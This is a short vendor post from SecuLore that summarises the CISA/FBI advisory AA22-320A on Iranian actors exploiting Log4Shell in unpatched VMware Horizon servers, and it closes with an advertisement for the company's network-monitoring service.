During an incident response review, CISA observed suspected advanced persistent threat (APT) activity within a Federal Civilian Executive Branch (FCEB) network. “CISA determined that Iranian threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server.” These cyber threat actors were able to install XMRig crypto mining software, move laterally to the domain controller (DC), compromise credentials, and implant Ngrok reverse proxies on several hosts to maintain persistence.
CISA and the FBI released Cybersecurity Advisory (CSA) Alert (AA22-320A) to highlight ongoing Log4j vulnerability concerns on unpatched VMware systems. The alert advises that all organizations that did not apply patches or workarounds should assume they’ve been compromised and should immediately engage in threat hunting activity and look for anomalous network behavior.
“If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.”
SecuLore™ OverWatch provides 24/7/365 network monitoring through our patented Paladin™ technology to detect vulnerabilities in your network and detect anomalous behavior. The technology passively captures all traffic on your network to identify threats that are often missed by other layers of security. The packet captures are sent to our Security Operations Center to be processed via a unique behavioral analysis that is constantly reviewed by our team of CEH (Certified Ethical Hackers).
SecuLore Support Team